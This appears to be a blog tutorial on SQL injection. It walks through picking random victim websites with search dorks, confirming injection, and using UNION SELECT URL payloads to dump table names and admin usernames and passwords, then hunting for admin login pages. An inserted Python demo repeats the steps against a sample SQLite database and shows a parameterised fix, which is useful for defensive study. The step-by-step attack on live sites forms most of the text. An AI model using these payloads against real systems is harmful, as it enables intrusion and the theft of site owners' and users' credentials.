We have seen many vulnerabilities in different areas. In this post I am going to explain a vulnerability of applications that use a SQL database (web applications in particular). Many of us are familiar with web development; developers tend to concentrate on interface design rather than on accessing the database in a secure way. Because of this, a lot of sites on the internet are vulnerable, which of course is good entertainment for hackers (who enjoy the flaws).
Well, let me introduce the vulnerability of SQL: "SQL injection".
What is SQL injection?
SQL injection is a code injection technique that exploits a security vulnerability in an application's software. The vulnerability arises when user input is either incorrectly filtered for string literal escape characters embedded in SQL statements, or is not strongly typed, and so is unexpectedly executed as part of the SQL. SQL commands are thus injected from an application form into the application's database (as queries) to change the database contents or to dump database information such as credit card numbers or passwords to the attacker. SQL injection is mostly known as an attack vector for websites but can be used to attack any type of SQL database.
In simple words, SQL injection is a technique often used to attack data-driven applications (not just web applications, but any type of application that maintains a database).
What can hackers do with this?
* Bypassing logins
* Accessing secret data
* Modifying contents of the website
* Shutting down the MySQL server
ATTACK STYLE
Step 1:
If you already have a specific target to attack, you do not need this step. If there is no target, you have to find a website that is driven by a database.
It is very easy to find database-driven websites using an advanced search keyword.
(The keyword is "inurl"; with it the search engine matches the results against the URL only.)
Some Examples:
inurl:index.php?id=
inurl:gallery.php?id=
inurl:article.php?id=
inurl:pageid=
So the attacker finds a lot of sites in the search results, then chooses one target.
Step 2:
Checking the Vulnerability:
Now let us see how a hacker checks whether the target website is vulnerable. To check the vulnerability,
add a single quote (') at the end of the URL and hit enter.
For eg:
http://www.victim.com/index.php?id=2'
If the page stays the same or shows "page not found", this quick test has not shown it to be vulnerable. (Be aware that this is only a quick test: a site that hides its database errors can still be injectable, it just has to be exploited blindly, without the help of error messages.) If you get an error message like the following, the site is vulnerable:
you have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'' at line 1
Step 3: Finding Number of columns:
The hacker has found a place (URL) where the website is vulnerable to SQLi. The next step is to find the number of columns returned by the vulnerable query. (ORDER BY n sorts by the nth column of the SELECT the page runs, so it fails once n exceeds that count; the UNION in Step 4 must use exactly the same number of columns.)
For that, replace the single quote (') with an "order by n" statement.
Change n to 1, 2, 3, 4, 5, 6, ... n.
The hacker does this until he gets an error like "Unknown column".
For eg:
http://www.victimsite.com/index.php?id=2 order by 1
http://www.victimsite.com/index.php?id=2 order by 2
http://www.victimsite.com/index.php?id=2 order by 3
http://www.victimsite.com/index.php?id=2 order by 4
If the hacker gets the error while trying the "x"th number, then the number of columns is "x-1".
I mean:
http://www.victimsite.com/index.php?id=2 order by 1 (no error)
http://www.victimsite.com/index.php?id=2 order by 2 (no error)
http://www.victimsite.com/index.php?id=2 order by 3 (no error)
http://www.victimsite.com/index.php?id=2 order by 4 (no error)
http://www.victimsite.com/index.php?id=2 order by 5 (no error)
http://www.victimsite.com/index.php?id=2 order by 6 (no error)
http://www.victimsite.com/index.php?id=2 order by 7 (no error)
http://www.victimsite.com/index.php?id=2 order by 8 (error)
So now x=8, and the number of columns is x-1, i.e. 7.
In case the above method does not work, the hacker adds "--" at the end of the statement; it comments out whatever SQL the application appends after the injected value. (In MySQL a "--" comment must be followed by a space, and that trailing space is often lost in a URL, so "-- -" or "--+" is commonly used instead; "#" also starts a comment in MySQL.)
For eg:
http://www.victimsite.com/index.php?id=2 order by 1--
Step 4: Finding the vulnerable columns:
Now the hacker has successfully discovered the number of columns in the vulnerable query. The next step is to find the vulnerable column, i.e. a column whose value the page actually displays, by trying the query "union select columns_sequence".
Change the id value to a negative one (i.e. id=-2) so that no real row matches and only the row produced by the UNION is returned. Replace columns_sequence with the numbers 1 to x-1 (the number of columns) separated by commas (,).
For eg:
If the number of columns is 7, then the query is as follows:
http://www.victimsite.com/index.php?id=-2 union select 1,2,3,4,5,6,7--
If the above method is not working, then the hacker will try the following:
http://www.victimsite.com/index.php?id=-2 and 1=2 union select 1,2,3,4,5,6,7--
Once the query executes, the numbers that show up in the rendered page reveal which columns are displayed. Bingo, columns '3' and '7' are found to be vulnerable. The hacker takes the first vulnerable column, '3'; he can inject his query into this column.
Step 5: Finding version, database, user
Replace the 3 in the query with "version()".
For eg:
http://www.victimsite.com/index.php?id=-2 and 1=2 union select 1,2,version(),4,5,6,7--
Now it will display the version, something like 5.0.1 or 4.3. Again, replace version() with database() and user() to find the database and the user respectively.
For eg:
http://www.victimsite.com/index.php?id=-2 and 1=2 union select 1,2,database(),4,5,6,7--
http://www.victimsite.com/index.php?id=-2 and 1=2 union select 1,2,user(),4,5,6,7--
If the above is not working, then the hacker will try the following (wrapping the value in unhex(hex(...)) forces it to a plain string, which helps when the displayed column has a different type or collation):
http://www.victimsite.com/index.php?id=-2 and 1=2 union select 1,2,unhex(hex(@@version)),4,5,6,7--
Step 6: Finding the table name
This step works if the database version is 5 or above, because MySQL 5 introduced the information_schema database that lists every table and column. If the version is 4.x, then you have to guess the table names (blind SQL injection attack).
Let us find the table names of the database. Replace the 3 with "group_concat(table_name)" and add "from information_schema.tables where table_schema=database()".
For eg:
http://www.victimsite.com/index.php?id=-2 and 1=2 union select 1,2,group_concat(table_name),4,5,6,7 from information_schema.tables where table_schema=database()--
Now it will display the list of table names. Find the table name which is related to the admin or user.
Let us choose the "admin" table.
Step 7: Finding the column name
Now replace "group_concat(table_name)" with "group_concat(column_name)".
Replace "from information_schema.tables where table_schema=database()--" with "from information_schema.columns where table_name=mysqlchar--".
We have to convert the table name to a MySQL CHAR() string, so that the query contains no quote characters (which the application may escape or strip). A hex literal such as 0x61646d696e ('admin') works the same way.
Install the HackBar addon:
https://addons.mozilla.org/en-US/firefox/addon/3899/
Once you have installed the add-on, you will see a new toolbar. If you cannot see the HackBar, press F9.
Select SQL -> MySQL -> MySqlChar() in the HackBar.
It will ask you to enter the string that you want to convert to MySQL CHAR(). We want to convert the table name; in our case the table name is 'admin'.
Now you can see CHAR(numbers separated with commas) in the HackBar toolbar.
Copy and paste the code at the end of the URL in place of "mysqlchar".
For eg:
http://www.victimsite.com/index.php?id=-2 and 1=2 union select 1,2,group_concat(column_name),4,5,6,7 from information_schema.columns where table_name=CHAR(97, 100, 109, 105, 110)--
The above query will display the list of columns.
For example: admin,password,admin_id,admin_name,admin_password,active,id,admin_name,admin_pass,admin_id,admin_name,admin_password,ID_admin,admin_username,username,password...etc.
Now replace group_concat(column_name) with group_concat(columnname1,0x3a,anothercolumnname2). (0x3a is the hex form of ':' and separates the two values; in MySQL, group_concat concatenates all of its arguments for each row.)
Now replace "from information_schema.columns where table_name=CHAR(97, 100, 109, 105, 110)" with "from table_name".
For eg:
http://www.victimsite.com/index.php?id=-2 and 1=2 union select 1,2,group_concat(admin_id,0x3a,admin_password),4,5,6,7 from admin--
If the above query displays a 'column not found' error, then try another column name from the list. If we get lucky, it will display the data stored in the database for the chosen columns. For instance, the username and password columns will display the login credentials stored in the database.
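To make Steps 2 to 7 concrete, here is an added example (not code from the original post) that stands in for the vulnerable index.php?id= page and runs the whole procedure against it offline, using Python's bundled sqlite3. Everything in it is hypothetical: the table names, the 7-column query (chosen to match the numbers above) and the credentials are constructed sample data, and SQLite stands in for MySQL, so sqlite_version() and sqlite_master replace version() and information_schema. The injection mechanics (the quote probe, ORDER BY counting, the negative id plus UNION SELECT, group_concat, and char() instead of quotes) are the same, and the hardened version of the page at the end shows why the payloads stop working once the id is validated and bound as a parameter.

```python
# Added example, not code from the original post: a throw-away stand-in for the
# vulnerable index.php?id= page from Steps 2-7. All names and data below are
# constructed for the demo; SQLite replaces MySQL, so sqlite_version() and
# sqlite_master stand in for version() and information_schema.
import sqlite3
import re


def make_db():
    """Constructed sample database: a 7-column articles table and an admin table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE articles (id INTEGER, title TEXT, body TEXT, "
                 "author TEXT, tags TEXT, views INTEGER, created TEXT)")
    conn.execute("INSERT INTO articles VALUES (2, 'Hello', 'First post', "
                 "'alice', 'intro', 10, '2012-01-01')")
    conn.execute("CREATE TABLE admin (admin_id INTEGER, admin_name TEXT, "
                 "admin_password TEXT)")
    conn.execute("INSERT INTO admin VALUES (1, 'admin', 's3cret')")
    conn.execute("INSERT INTO admin VALUES (2, 'editor', 'hunter2')")
    return conn


def render(conn, id_param):
    """The vulnerable page: id is pasted straight into the SQL string, and only
    title and body (columns 2 and 3 of the SELECT) are shown to the visitor."""
    sql = ("SELECT id,title,body,author,tags,views,created FROM articles "
           "WHERE id=" + id_param)
    try:
        rows = conn.execute(sql).fetchall()
    except sqlite3.Error as err:      # the database error Step 2 relies on
        return "SQL error: %s" % err
    if not rows:
        return "Not found"
    return "Title: %s | Body: %s" % (rows[0][1], rows[0][2])


def probe(conn):
    """Step 2: a stray quote that produces a database error marks the page injectable."""
    return render(conn, "2'").startswith("SQL error")


def count_columns(conn, max_cols=20):
    """Step 3: ORDER BY n fails once n exceeds the SELECT's column count,
    so the first failing n minus one is the number of columns."""
    for n in range(1, max_cols + 1):
        if render(conn, "2 order by %d--" % n).startswith("SQL error"):
            return n - 1
    return None


def visible_columns(conn, ncols):
    """Step 4: a negative id drops the real row; the marker numbers that survive
    rendering are the columns the page displays (the 'vulnerable' columns)."""
    seq = ",".join(str(i) for i in range(1, ncols + 1))
    page = render(conn, "-2 union select %s--" % seq)
    found = set(re.findall(r"\d+", page))
    return [i for i in range(1, ncols + 1) if str(i) in found]


def extract(conn, ncols, expr, from_clause=""):
    """Steps 5-7: put an expression into visible column 3 (the body) and read
    the result back out of the rendered page. Assumes ncols >= 3."""
    parts = [str(i) for i in range(1, ncols + 1)]
    parts[2] = expr
    page = render(conn, "-2 union select %s %s--" % (",".join(parts), from_clause))
    return page.split(" | Body: ", 1)[1] if " | Body: " in page else page


def db_version(conn):
    """Ground truth for the Step 5 check, read directly rather than via injection."""
    return conn.execute("SELECT sqlite_version()").fetchone()[0]


def safe_render(conn, id_param):
    """The fix: validate the type and bind the value as a parameter. The same
    payloads are now rejected or compared as data, never parsed as SQL."""
    try:
        id_value = int(id_param)
    except ValueError:
        return "Bad request"
    row = conn.execute("SELECT title, body FROM articles WHERE id=?",
                       (id_value,)).fetchone()
    return "Not found" if row is None else "Title: %s | Body: %s" % row


if __name__ == "__main__":
    c = make_db()
    print("injectable:", probe(c))
    n = count_columns(c)
    print("columns:", n, "visible:", visible_columns(c, n))
    print("version:", extract(c, n, "sqlite_version()"))
    print("tables:", extract(c, n, "group_concat(name)",
                             "from sqlite_master where type='table'"))
    # char(97,100,109,105,110) spells 'admin' without quote characters, as in Step 7
    print("schema:", extract(c, n, "sql",
                             "from sqlite_master where name=char(97,100,109,105,110)"))
    print("creds:", extract(c, n, "group_concat(admin_name||char(58)||admin_password)",
                            "from admin"))
    print("hardened:", safe_render(c, "-2 union select 1,2,3,4,5,6,7--"))
```

Run it as a script to watch each step succeed against render() and fail against safe_render(). The only difference between the two page functions is that the hardened one never lets the request parameter touch the SQL text: the value is type-checked and passed as a bound parameter, which is the fix a developer should apply to every query the site builds from user input.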
Step 8: Finding the admin panel:
Just try URLs like:
http://www.victimsite.com/admin.php
http://www.victimsite.com/admin/
http://www.victimsite.com/admin.html
http://www.victimsite.com:2082/
etc. If you get lucky, you will find the admin page using the above URLs, or you can use some kind of admin finder tool.
Note (warning):
The articles in this blog are for educational purposes only. In no manner does this author/blog intend to encourage hacking over the network. The author is not responsible for any issues caused by your actions; you act at your own risk. Please have a kind sense and be ETHICAL.